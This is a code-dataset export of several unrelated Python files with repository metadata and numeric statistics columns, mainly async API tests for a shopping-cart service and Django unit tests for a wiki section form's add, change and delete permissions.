| 34.165468 | 77 | 0.607075 | 556 | 4,749 | 4.861511 | 0.134892 | 0.073252 | 0.075472 | 0.08879 | 0.861635 | 0.861635 | 0.837588 | 0.770995 | 0.736959 | 0.72697 | 0 | 0.004287 | 0.263213 | 4,749 | 138 | 78 | 34.413043 | 0.768219 | 0 | 0 | 0.59633 | 0 | 0 | 0.197726 | 0.089703 | 0 | 0 | 0 | 0 | 0.110092 | 1 | 0.073395 | false | 0 | 0.027523 | 0 | 0.137615 | 0.009174 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
c3e5eb9d0af51018c4e53de087b71375ddba5ff8 | 37 | py | Python | helper3.py | jbf5ca/cs3240-labdemo | 21f8b6305464eb8066a481df29d8ddfc601a0c6c | [
"MIT"
] | null | null | null | helper3.py | jbf5ca/cs3240-labdemo | 21f8b6305464eb8066a481df29d8ddfc601a0c6c | [
"MIT"
] | null | null | null | helper3.py | jbf5ca/cs3240-labdemo | 21f8b6305464eb8066a481df29d8ddfc601a0c6c | [
"MIT"
] | null | null | null | def closing():
print("Good bye")
| 12.333333 | 21 | 0.594595 | 5 | 37 | 4.4 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.216216 | 37 | 2 | 22 | 18.5 | 0.758621 | 0 | 0 | 0 | 0 | 0 | 0.216216 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | true | 0 | 0 | 0 | 0.5 | 0.5 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
7f1ede14ca88eb64142d1f6c93b0324e1e1724a7 | 4,242 | py | Python | src/tests/test_v1_shopping_cart_items_[id]_PUT.py | daniellima/desafio-lojaintegrada | 3cb17f4ec9769472e111adfe6d550e668518aabd | [
"MIT"
] | null | null | null | src/tests/test_v1_shopping_cart_items_[id]_PUT.py | daniellima/desafio-lojaintegrada | 3cb17f4ec9769472e111adfe6d550e668518aabd | [
"MIT"
] | null | null | null | src/tests/test_v1_shopping_cart_items_[id]_PUT.py | daniellima/desafio-lojaintegrada | 3cb17f4ec9769472e111adfe6d550e668518aabd | [
"MIT"
] | null | null | null |
async def test_update_quantity_of_item_should_be_a_success(client):
resp = await client.post('/v1/shopping_cart/items', json={
'id': '5',
'quantity': 2
})
assert resp.status == 201
assert (await resp.json()) == {
'id': '5',
'name': 'Playstation 5',
'price': 3000
}
resp = await client.get('/v1/shopping_cart')
assert resp.status == 200
assert (await resp.json()) == {
'items': [
{
'id': '5',
'name': 'Playstation 5',
'price': 3000,
'quantity': 2
}
],
'coupons': [],
'subtotal': 6000,
'total': 6000
}
resp = await client.put('/v1/shopping_cart/items/5', json={
'quantity': 5
})
assert resp.status == 200
assert (await resp.json()) == {}
resp = await client.get('/v1/shopping_cart')
assert resp.status == 200
assert (await resp.json()) == {
'items': [
{
'id': '5',
'name': 'Playstation 5',
'price': 3000,
'quantity': 5
}
],
'coupons': [],
'subtotal': 15000,
'total': 15000
}
async def test_update_quantity_of_unknow_item_should_result_in_error(client):
resp = await client.put('/v1/shopping_cart/items/999', json={
'quantity': 1
})
assert resp.status == 400
assert (await resp.json()) == {
'error': {
'type': 'item_not_found',
'message': 'Item with id "999" was not found'
}
}
async def test_update_quantity_of_existing_item_not_in_shopping_cart_should_result_in_error(client):
resp = await client.post('/v1/shopping_cart/items', json={
'id': '5',
'quantity': 1
})
assert resp.status == 201
assert (await resp.json()) == {
'id': '5',
'name': 'Playstation 5',
'price': 3000
}
resp = await client.put('/v1/shopping_cart/items/6', json={
'quantity': 1
})
assert resp.status == 400
assert (await resp.json()) == {
'error': {
'type': 'item_not_found',
'message': 'Item with id "6" was not found'
}
}
async def test_update_quantity_of_item_with_quantity_greater_than_stock_should_result_in_error(client):
resp = await client.post('/v1/shopping_cart/items', json={
'id': '5',
'quantity': 1
})
assert resp.status == 201
assert (await resp.json()) == {
'id': '5',
'name': 'Playstation 5',
'price': 3000
}
resp = await client.put('/v1/shopping_cart/items/5', json={
'quantity': 1000
})
assert resp.status == 400
assert (await resp.json()) == {
'error': {
'type': 'out_of_stock',
'message': 'Item with id "5" don\'t have 1000 or more itens in stock'
}
}
async def test_update_quantity_of_item_with_empty_body_should_result_in_error(client):
resp = await client.post('/v1/shopping_cart/items', json={
'id': '5',
'quantity': 2
})
assert resp.status == 201
assert (await resp.json()) == {
'id': '5',
'name': 'Playstation 5',
'price': 3000
}
resp = await client.put('/v1/shopping_cart/items/5', json={})
assert resp.status == 400
assert (await resp.json()) == {
'error': {
'type': 'failed_validating_json',
'message': 'Missing key: \'quantity\''
}
}
async def test_update_quantity_of_item_with_zero_quantity_should_result_in_error(client):
resp = await client.post('/v1/shopping_cart/items', json={
'id': '5',
'quantity': 1
})
assert resp.status == 201
assert (await resp.json()) == {
'id': '5',
'name': 'Playstation 5',
'price': 3000
}
resp = await client.put('/v1/shopping_cart/items/5', json={
'quantity': 0
})
assert resp.status == 400
assert (await resp.json()) == {
'error': {
'type': 'failed_validating_json',
'message': 'Key \'quantity\' must be greater than 0'
}
}
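The tests above depend on an aiohttp-style `client` fixture supplied by the test runner. A stdlib-only sketch of the same async arrange/act/assert shape, using a hypothetical in-memory client in place of the real HTTP one:

```python
import asyncio

class FakeCartClient:
    """Hypothetical stand-in for the aiohttp test client used above."""
    async def put(self, path, json=None):
        quantity = (json or {}).get('quantity')
        if not isinstance(quantity, int) or quantity <= 0:
            return {'status': 400}
        return {'status': 200}

async def exercise():
    client = FakeCartClient()
    ok = await client.put('/v1/shopping_cart/items/5', json={'quantity': 1})
    bad = await client.put('/v1/shopping_cart/items/5', json={'quantity': 0})
    return ok['status'], bad['status']

statuses = asyncio.run(exercise())
```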
| 22.92973 | 103 | 0.522159 | 474 | 4,242 | 4.487342 | 0.154008 | 0.078984 | 0.091678 | 0.116126 | 0.868829 | 0.868829 | 0.855665 | 0.840621 | 0.755994 | 0.719323 | 0 | 0.052338 | 0.324375 | 4,242 | 184 | 104 | 23.054348 | 0.689812 | 0 | 0 | 0.690647 | 0 | 0 | 0.218345 | 0.073332 | 0 | 0 | 0 | 0 | 0.18705 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
618475825ca311cef83fee961ad67a16c8647654 | 89 | py | Python | pulotu/adapters.py | blurks/pulotu | 621460f3d4dbe05367ed4814b95d192df348cb72 | [
"Apache-2.0"
] | null | null | null | pulotu/adapters.py | blurks/pulotu | 621460f3d4dbe05367ed4814b95d192df348cb72 | [
"Apache-2.0"
] | 1 | 2021-11-19T16:50:11.000Z | 2021-11-19T16:55:17.000Z | pulotu/adapters.py | blurks/pulotu | 621460f3d4dbe05367ed4814b95d192df348cb72 | [
"Apache-2.0"
] | 1 | 2021-11-22T13:28:14.000Z | 2021-11-22T13:28:14.000Z | from clld.web.adapters.geojson import GeoJsonParameter
def includeme(config):
pass
| 14.833333 | 54 | 0.786517 | 11 | 89 | 6.363636 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.146067 | 89 | 5 | 55 | 17.8 | 0.921053 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0.333333 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 1 | 0 | 1 | 0 | 0 | 6 |
4ef73f081cb6eb6e5b9d8eb825ea0c4adfc55599 | 145 | py | Python | native/libcst/tests/fixtures/expr_statement.py | jschavesr/LibCST | e5ab7b90b4c9cd1f46e5b875ad317411abf48298 | [
"Apache-2.0"
] | 880 | 2019-08-07T21:21:11.000Z | 2022-03-29T06:25:34.000Z | native/libcst/tests/fixtures/expr_statement.py | jschavesr/LibCST | e5ab7b90b4c9cd1f46e5b875ad317411abf48298 | [
"Apache-2.0"
] | 537 | 2019-08-08T18:34:30.000Z | 2022-03-30T16:46:14.000Z | native/libcst/tests/fixtures/expr_statement.py | jschavesr/LibCST | e5ab7b90b4c9cd1f46e5b875ad317411abf48298 | [
"Apache-2.0"
] | 108 | 2019-08-08T00:17:21.000Z | 2022-03-24T20:53:31.000Z | 1
1, 2, 3
x = 1
x = 1, 2, 3
x = y = z = 1, 2, 3
x, y, z = 1, 2, 3
abc = a, b, c = x, y, z = xyz = 1, 2, (3, 4)
( ( ( ... ) ) )
a , = b | 13.181818 | 44 | 0.275862 | 36 | 145 | 1.111111 | 0.333333 | 0.25 | 0.375 | 0.3 | 0.375 | 0.375 | 0.375 | 0.375 | 0.375 | 0 | 0 | 0.225 | 0.448276 | 145 | 11 | 45 | 13.181818 | 0.275 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
f6150b4fdd3301f4570c7b75bcae5f0f827c6f26 | 92 | py | Python | flask_philo/commands_flask_philo/aws.py | maigfrga/flask-philo | f46d766c0f2607a5df193d532abb7b9cb576f909 | [
"Apache-2.0"
] | 1 | 2017-04-27T09:05:08.000Z | 2017-04-27T09:05:08.000Z | flask_philo/commands_flask_philo/aws.py | maigfrga/flask-philo | f46d766c0f2607a5df193d532abb7b9cb576f909 | [
"Apache-2.0"
] | 32 | 2016-09-30T14:42:21.000Z | 2017-11-02T14:34:34.000Z | flask_philo/commands_flask_philo/aws.py | maigfrga/flask-philo | f46d766c0f2607a5df193d532abb7b9cb576f909 | [
"Apache-2.0"
] | 7 | 2016-06-28T10:03:21.000Z | 2017-01-23T17:29:29.000Z | from flask_philo.cloud.aws import run as aws_run
def run(**kwargs):
aws_run(**kwargs)
| 15.333333 | 48 | 0.717391 | 16 | 92 | 3.9375 | 0.625 | 0.190476 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.163043 | 92 | 5 | 49 | 18.4 | 0.818182 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | true | 0 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
f6188477061e5f2f36b403da0990ad0f317f87ad | 22,637 | py | Python | wiki/test/test_wikisectionform.py | IgalMilman/DnDHelper | 334822a489e7dc2b5ae17230e5c068b89c6c5d10 | [
"MIT"
] | null | null | null | wiki/test/test_wikisectionform.py | IgalMilman/DnDHelper | 334822a489e7dc2b5ae17230e5c068b89c6c5d10 | [
"MIT"
] | null | null | null | wiki/test/test_wikisectionform.py | IgalMilman/DnDHelper | 334822a489e7dc2b5ae17230e5c068b89c6c5d10 | [
"MIT"
] | null | null | null | import copy
import os
import uuid
from datetime import datetime, timedelta
import mock
import pytz
from django.conf import settings
from django.contrib.auth.models import User
from django.test import TestCase
from utils.widget import quill
from wiki.forms import wikisectionform
from wiki.models import wikipage, wikisection
from wiki.models.permissionsection import PermissionSection
from wiki.models.wikipage import Keywords, WikiPage
from wiki.models.wikisection import WikiSection
def render_mock(request, template, data, content_type='test'):
return {'request':request, 'template':template, 'data': data, 'content_type':content_type}
def redirect_mock(link):
return link
def reverse_mock(link, kwargs=None):
if kwargs is None:
return link
return link
class req:
    def __init__(self, method='GET', post=None, user=None):
        self.method = method
        self.user = user
        self.POST = post if post is not None else {}  # avoid a shared mutable default
class WikiSectionFormTestCase(TestCase):
def setUp(self):
        self.firstUser = User(is_superuser=True, username='test1', password='test1', email='test1@example.com', first_name='testname1', last_name='testlast1')
self.secondUser = User(is_superuser=False, username='test2', password='test2', email='test2@example.com', first_name='testname2', last_name='testlast2')
self.thirdUser = User(is_superuser=False, username='test3', password='test3', email='test3@example.com', first_name='testname3', last_name='testlast3')
self.fourthUser = User(is_superuser=False, username='test4', password='test4', email='test4@example.com', first_name='testname4', last_name='testlast4')
self.firstUser.save()
self.secondUser.save()
self.thirdUser.save()
self.fourthUser.save()
self.wikiuuid = [uuid.uuid4(), uuid.uuid4(), uuid.uuid4(), uuid.uuid4()]
self.wikistext = ['{"ops":[{"insert":"123123\\n"}]}', 'text', None]
self.wikisuuid = [uuid.uuid4(), uuid.uuid4(), uuid.uuid4(), uuid.uuid4(), uuid.uuid4()]
self.wikipath = 'wiki'
self.wikipagelink = 'wiki_page'
self.wikimainpagelink = 'wiki_homepage'
self.softwarename = 'name'
self.formtemplate = 'forms/unimodelform.html'
self.contenttype = 'text/html'
self.createdtime = datetime.now(pytz.utc)
self.wikiPages = []
self.permissions = []
for i in range(2):
self.wikiPages.append(WikiPage(unid=self.wikiuuid[i], createdon=self.createdtime, updatedon=self.createdtime, createdby=self.firstUser, updatedby=self.secondUser, title='testpage'+str(i+1)))
self.wikiPages[i].save()
self.wikiPages[i].createdon=self.createdtime + timedelta(hours=i)
self.wikiPages[i].updatedon=self.createdtime + timedelta(hours=i)
self.wikiPages[i].save()
self.wikiSections = []
for i in range(3):
self.wikiSections.append(WikiSection(unid=self.wikisuuid[i], createdon=self.createdtime, updatedon=self.createdtime, createdby=self.firstUser, updatedby=self.secondUser, title='testsec'+str(i+1), pageorder=i+1, text=self.wikistext[i], wikipage=self.wikiPages[0]))
self.wikiSections[i].save()
self.wikiSections[i].createdon=self.createdtime + timedelta(hours=i)
self.wikiSections[i].updatedon=self.createdtime + timedelta(hours=i)
perm = PermissionSection(createdby=self.firstUser, accesslevel=10, grantedto=self.thirdUser, section=self.wikiSections[i])
perm.save()
self.permissions.append(perm)
perm = PermissionSection(createdby=self.firstUser, accesslevel=30, grantedto=self.secondUser, section=self.wikiSections[i])
perm.save()
self.permissions.append(perm)
if i==1:
self.wikiSections[1].createdby = None
self.wikiSections[1].updatedby = None
self.wikiSections[i].save()
settings.SOFTWARE_NAME_SHORT = self.softwarename
wikisectionform.settings.SOFTWARE_NAME_SHORT = self.softwarename
os.path.exists = mock.Mock(return_value=True, spec='os.path.exists')
os.makedirs = mock.Mock(return_value=None, spec='os.makedirs')
wikisectionform.render = mock.Mock(side_effect=render_mock)
wikisectionform.redirect = mock.Mock(side_effect=redirect_mock)
wikisectionform.reverse = mock.Mock(side_effect=reverse_mock)
wikipage.reverse = mock.Mock(side_effect=reverse_mock)
wikisection.reverse = mock.Mock(side_effect=reverse_mock)
def test_wiki_section_form_get_request_super_user(self):
post = {'action':'add'}
method = 'GET'
request = req(method=method, user=self.firstUser, post=post)
result = wikisectionform.WikiSectionFormParse(request, self.wikiPages[0].unid)
self.assertEqual(result['request'], request)
self.assertEqual(result['template'], self.formtemplate)
data = result['data']
self.assertEqual(data['action'], 'add')
self.assertEqual(data['PAGE_TITLE'], 'Add section: ' + self.softwarename)
self.assertEqual(data['minititle'], 'Add Section')
self.assertEqual(data['submbutton'], 'Add section')
self.assertEqual(data['backurl'], self.wikipagelink)
self.assertEqual(data['needquillinput'], True)
self.assertIsInstance(data['form'], wikisectionform.WikiSectionForm)
self.assertEqual(result['content_type'], self.contenttype)
def test_wiki_section_form_get_request_no_access(self):
method = 'GET'
request = req(method=method, user=self.thirdUser)
result = wikisectionform.WikiSectionFormParse(request, self.wikiPages[0].unid)
self.assertEqual(result, self.wikipagelink)
def test_wiki_section_form_get_request_no_permissions(self):
method = 'GET'
request = req(method=method, user=self.fourthUser)
result = wikisectionform.WikiSectionFormParse(request, self.wikiPages[0].unid)
self.assertEqual(result, self.wikipagelink)
def test_wiki_section_form_post_request_no_action_super_user(self):
post = {}
method = 'POST'
request = req(method=method, user=self.firstUser, post=post)
result = wikisectionform.WikiSectionFormParse(request, self.wikiPages[0].unid)
self.assertEqual(result['request'], request)
self.assertEqual(result['template'], self.formtemplate)
data = result['data']
self.assertEqual(data['action'], 'add')
self.assertEqual(data['PAGE_TITLE'], 'Add section: ' + self.softwarename)
self.assertEqual(data['minititle'], 'Add Section')
self.assertEqual(data['submbutton'], 'Add section')
self.assertEqual(data['backurl'], self.wikipagelink)
self.assertEqual(data['needquillinput'], True)
self.assertIsInstance(data['form'], wikisectionform.WikiSectionForm)
self.assertEqual(result['content_type'], self.contenttype)
def test_wiki_section_form_post_request_no_action_no_access(self):
post = {}
method = 'POST'
request = req(method=method, user=self.thirdUser, post=post)
result = wikisectionform.WikiSectionFormParse(request, self.wikiPages[0].unid)
self.assertEqual(result, self.wikipagelink)
def test_wiki_section_form_post_request_no_action_no_permissions(self):
post = {}
method = 'POST'
request = req(method=method, user=self.fourthUser, post=post)
result = wikisectionform.WikiSectionFormParse(request, self.wikiPages[0].unid)
self.assertEqual(result, self.wikipagelink)
def test_wiki_section_form_add_request_success(self):
form = wikisectionform.WikiSectionForm(instance=self.wikiSections[0])
post = form.initial
post['action'] = 'add'
method = 'POST'
WikiSection.objects.all().delete()
request = req(method=method, user=self.firstUser, post=post)
result = wikisectionform.WikiSectionFormParse(request, self.wikiPages[0].unid)
self.assertEqual(result, self.wikipagelink)
self.assertEqual(WikiSection.objects.count(), 1)
wikis = WikiSection.objects.all()[0]
self.assertEqual(wikis.title, self.wikiSections[0].title)
self.assertEqual(wikis.text, self.wikiSections[0].text)
self.assertEqual(wikis.pageorder, self.wikiSections[0].pageorder)
self.assertEqual(wikis.createdby, self.firstUser)
self.assertEqual(wikis.updatedby, self.firstUser)
def test_wiki_section_form_add_request_fail_no_access(self):
form = wikisectionform.WikiSectionForm(instance=self.wikiSections[0])
post = form.initial
post['action'] = 'add'
method = 'POST'
request = req(method=method, user=self.thirdUser, post=post)
result = wikisectionform.WikiSectionFormParse(request, self.wikiPages[0].unid)
self.assertEqual(result, self.wikipagelink)
def test_wiki_section_form_add_request_fail_no_permissions(self):
form = wikisectionform.WikiSectionForm(instance=self.wikiSections[0])
post = form.initial
post['action'] = 'add'
method = 'POST'
request = req(method=method, user=self.fourthUser, post=post)
result = wikisectionform.WikiSectionFormParse(request, self.wikiPages[0].unid)
self.assertEqual(result, self.wikipagelink)
def test_wiki_section_form_add_request_failed_no_title(self):
post = {'action':'add', 'title':None}
method = 'POST'
request = req(method=method, user=self.firstUser, post=post)
result = wikisectionform.WikiSectionFormParse(request, self.wikiPages[0].unid)
self.assertEqual(result['request'], request)
self.assertEqual(result['template'], self.formtemplate)
data = result['data']
self.assertEqual(data['action'], 'add')
self.assertEqual(data['PAGE_TITLE'], 'Add section: ' + self.softwarename)
self.assertEqual(data['minititle'], 'Add Section')
self.assertEqual(data['submbutton'], 'Add section')
self.assertEqual(data['backurl'], self.wikipagelink)
self.assertEqual(data['needquillinput'], True)
self.assertIsInstance(data['form'], wikisectionform.WikiSectionForm)
self.assertTrue(('title' in data['form'].data) or (data['form'].data == {}))
self.assertEqual(result['content_type'], self.contenttype)
def test_wiki_section_form_change_request_success(self):
post = {'action':'change', 'targetid': self.wikiSections[0].unid}
method = 'POST'
request = req(method=method, user=self.firstUser, post=post)
result = wikisectionform.WikiSectionFormParse(request, self.wikiPages[0].unid)
self.assertEqual(result['request'], request)
self.assertEqual(result['template'], self.formtemplate)
data = result['data']
self.assertEqual(data['action'], 'changed')
self.assertEqual(data['targetid'], self.wikiSections[0].unid)
self.assertEqual(data['PAGE_TITLE'], 'Change section: ' + self.softwarename)
self.assertEqual(data['minititle'], 'Change Section')
self.assertEqual(data['submbutton'], 'Change section')
self.assertEqual(data['deletebutton'], 'Delete section')
self.assertEqual(data['backurl'], self.wikipagelink)
self.assertEqual(data['needquillinput'], True)
self.assertIsInstance(data['form'], wikisectionform.WikiSectionForm)
self.assertTrue('title' in data['form'].initial)
self.assertEqual(data['form'].initial['title'], self.wikiSections[0].title)
self.assertEqual(data['form'].initial['pageorder'], self.wikiSections[0].pageorder)
self.assertEqual(data['form'].initial['text'], self.wikiSections[0].text)
self.assertEqual(result['content_type'], self.contenttype)
def test_wiki_section_form_change_request_fail_no_access(self):
post = {'action':'change', 'targetid': self.wikiSections[0].unid}
method = 'POST'
request = req(method=method, user=self.thirdUser, post=post)
result = wikisectionform.WikiSectionFormParse(request, self.wikiPages[0].unid)
self.assertEqual(result, self.wikipagelink)
def test_wiki_section_form_change_request_fail_no_permissions(self):
post = {'action':'change', 'targetid': self.wikiSections[0].unid}
method = 'POST'
request = req(method=method, user=self.fourthUser, post=post)
result = wikisectionform.WikiSectionFormParse(request, self.wikiPages[0].unid)
self.assertEqual(result, self.wikipagelink)
def test_wiki_section_form_change_request_fail_no_section(self):
post = {'action':'change', 'targetid':uuid.uuid4()}
method = 'POST'
request = req(method=method, user=self.firstUser, post=post)
result = wikisectionform.WikiSectionFormParse(request, self.wikiPages[0].unid)
self.assertEqual(result, self.wikipagelink)
def test_wiki_section_form_change_request_fail_no_target_id(self):
post = {'action':'change'}
method = 'POST'
request = req(method=method, user=self.firstUser, post=post)
result = wikisectionform.WikiSectionFormParse(request, self.wikiPages[0].unid)
self.assertEqual(result, self.wikipagelink)
def test_wiki_section_form_changed_request_success_super_user(self):
form = wikisectionform.WikiSectionForm(instance=self.wikiSections[1])
post = form.initial
post['action'] = 'changed'
post['targetid'] = self.wikiSections[0].unid
method = 'POST'
request = req(method=method, user=self.firstUser, post=post)
result = wikisectionform.WikiSectionFormParse(request, self.wikiPages[0].unid)
self.assertEqual(result, self.wikipagelink)
wikis = WikiSection.objects.get(unid=self.wikiSections[0].unid)
self.assertEqual(wikis.title, self.wikiSections[1].title)
self.assertEqual(wikis.pageorder, self.wikiSections[1].pageorder)
self.assertEqual(wikis.createdby, self.firstUser)
self.assertEqual(wikis.updatedby, self.firstUser)
self.assertNotEqual(wikis.updatedon, wikis.createdon)
def test_wiki_section_form_changed_request_success_permissions(self):
form = wikisectionform.WikiSectionForm(instance=self.wikiSections[1])
post = form.initial
post['action'] = 'changed'
post['targetid'] = self.wikiSections[0].unid
method = 'POST'
request = req(method=method, user=self.secondUser, post=post)
result = wikisectionform.WikiSectionFormParse(request, self.wikiPages[0].unid)
self.assertEqual(result, self.wikipagelink)
wikis = WikiSection.objects.get(unid=self.wikiSections[0].unid)
self.assertEqual(wikis.title, self.wikiSections[1].title)
self.assertEqual(wikis.pageorder, self.wikiSections[1].pageorder)
self.assertEqual(wikis.createdby, self.firstUser)
self.assertEqual(wikis.updatedby, self.secondUser)
self.assertNotEqual(wikis.updatedon, wikis.createdon)
def test_wiki_section_form_changed_request_fail_no_access(self):
form = wikisectionform.WikiSectionForm(instance=self.wikiSections[1])
post = form.initial
post['action'] = 'changed'
post['targetid'] = self.wikiSections[0].unid
method = 'POST'
oldsection = copy.deepcopy(self.wikiSections[0])
request = req(method=method, user=self.thirdUser, post=post)
result = wikisectionform.WikiSectionFormParse(request, self.wikiPages[0].unid)
self.assertEqual(result, self.wikipagelink)
wikis = WikiSection.objects.get(unid=self.wikiSections[0].unid)
self.assertEqual(wikis.title, oldsection.title)
self.assertEqual(wikis.pageorder, oldsection.pageorder)
self.assertEqual(wikis.createdby, oldsection.createdby)
self.assertEqual(wikis.updatedby, oldsection.updatedby)
self.assertEqual(wikis.updatedon, oldsection.updatedon)
def test_wiki_section_form_changed_request_fail_no_permissions(self):
form = wikisectionform.WikiSectionForm(instance=self.wikiSections[1])
post = form.initial
post['action'] = 'changed'
post['targetid'] = self.wikiSections[0].unid
method = 'POST'
oldsection = copy.deepcopy(self.wikiSections[0])
request = req(method=method, user=self.fourthUser, post=post)
result = wikisectionform.WikiSectionFormParse(request, self.wikiPages[0].unid)
self.assertEqual(result, self.wikipagelink)
wikis = WikiSection.objects.get(unid=self.wikiSections[0].unid)
self.assertEqual(wikis.title, oldsection.title)
self.assertEqual(wikis.pageorder, oldsection.pageorder)
self.assertEqual(wikis.createdby, oldsection.createdby)
self.assertEqual(wikis.updatedby, oldsection.updatedby)
self.assertEqual(wikis.updatedon, oldsection.updatedon)
def test_wiki_section_form_changed_request_failed_no_title(self):
post = {'action':'changed', 'targetid': self.wikiSections[0].unid, 'title': None}
method = 'POST'
request = req(method=method, user=self.firstUser, post=post)
result = wikisectionform.WikiSectionFormParse(request, self.wikiPages[0].unid)
self.assertEqual(result['request'], request)
self.assertEqual(result['template'], self.formtemplate)
data = result['data']
self.assertEqual(data['action'], 'changed')
self.assertEqual(data['targetid'], self.wikiSections[0].unid)
self.assertEqual(data['PAGE_TITLE'], 'Change section: ' + self.softwarename)
self.assertEqual(data['minititle'], 'Change Section')
self.assertEqual(data['submbutton'], 'Change section')
self.assertEqual(data['deletebutton'], 'Delete section')
self.assertEqual(data['backurl'], self.wikipagelink)
self.assertEqual(data['needquillinput'], True)
self.assertIsInstance(data['form'], wikisectionform.WikiSectionForm)
self.assertTrue('title' in data['form'].initial)
self.assertEqual(data['form'].initial['title'], self.wikiSections[0].title)
self.assertEqual(data['form'].initial['pageorder'], self.wikiSections[0].pageorder)
self.assertEqual(data['form'].initial['text'], self.wikiSections[0].text)
self.assertEqual(result['content_type'], self.contenttype)
def test_wiki_section_form_changed_request_fail_no_page(self):
post = {'action':'changed', 'targetid':uuid.uuid4()}
method = 'POST'
request = req(method=method, user=self.firstUser, post=post)
result = wikisectionform.WikiSectionFormParse(request, self.wikiPages[0].unid)
self.assertEqual(result, self.wikipagelink)
def test_wiki_section_form_changed_request_fail_no_target_id(self):
post = {'action':'changed'}
method = 'POST'
request = req(method=method, user=self.firstUser, post=post)
result = wikisectionform.WikiSectionFormParse(request, self.wikiPages[0].unid)
self.assertEqual(result, self.wikipagelink)
def test_wiki_section_form_delete_request_success_super_user(self):
post = {'action':'delete', 'targetid':self.wikiSections[0].unid}
method = 'POST'
request = req(method=method, user=self.firstUser, post=post)
result = wikisectionform.WikiSectionFormParse(request, self.wikiPages[0].unid)
self.assertEqual(result, self.wikipagelink)
try:
wikis = WikiSection.objects.get(unid=self.wikiSections[0].unid)
except WikiSection.DoesNotExist:
wikis = None
self.assertIsNone(wikis)
def test_wiki_section_form_delete_request_success_permissions(self):
post = {'action':'delete', 'targetid':self.wikiSections[0].unid}
method = 'POST'
request = req(method=method, user=self.secondUser, post=post)
result = wikisectionform.WikiSectionFormParse(request, self.wikiPages[0].unid)
self.assertEqual(result, self.wikipagelink)
try:
wikis = WikiSection.objects.get(unid=self.wikiSections[0].unid)
except WikiSection.DoesNotExist:
wikis = None
self.assertIsNone(wikis)
def test_wiki_section_form_delete_request_fail_no_access(self):
post = {'action':'delete', 'targetid':self.wikiSections[0].unid}
method = 'POST'
request = req(method=method, user=self.thirdUser, post=post)
result = wikisectionform.WikiSectionFormParse(request, self.wikiPages[0].unid)
try:
wikis = WikiSection.objects.get(unid=self.wikiSections[0].unid)
except WikiSection.DoesNotExist:
wikis = None
self.assertIsNotNone(wikis)
self.assertEqual(result, self.wikipagelink)
def test_wiki_section_form_delete_request_fail_no_permissions(self):
post = {'action':'delete', 'targetid':self.wikiSections[0].unid}
method = 'POST'
request = req(method=method, user=self.fourthUser, post=post)
result = wikisectionform.WikiSectionFormParse(request, self.wikiPages[0].unid)
try:
wikis = WikiSection.objects.get(unid=self.wikiSections[0].unid)
except WikiSection.DoesNotExist:
wikis = None
self.assertIsNotNone(wikis)
self.assertEqual(result, self.wikipagelink)
def test_wiki_section_form_delete_request_fail_no_page(self):
post = {'action':'delete', 'targetid':uuid.uuid4()}
method = 'POST'
request = req(method=method, user=self.firstUser, post=post)
result = wikisectionform.WikiSectionFormParse(request, self.wikiPages[0].unid)
self.assertEqual(result, self.wikipagelink)
def test_wiki_section_form_delete_request_no_page(self):
post = {'action':'delete'}
method = 'POST'
request = req(method=method, user=self.firstUser, post=post)
result = wikisectionform.WikiSectionFormParse(request, uuid.uuid4())
self.assertEqual(result, self.wikimainpagelink)
def test_wiki_section_form_delete_request_fail_no_target_id(self):
post = {'action':'delete'}
method = 'POST'
request = req(method=method, user=self.firstUser, post=post)
result = wikisectionform.WikiSectionFormParse(request, self.wikiPages[0].unid)
self.assertEqual(result, self.wikipagelink)
def test_wiki_section_form_form_create_no_page(self):
post = {'action':'add'}
method = 'GET'
request = req(method=method, user=self.firstUser, post=post)
result = wikisectionform.WikiSectionFormCreate(request, None)
self.assertIsNone(result)
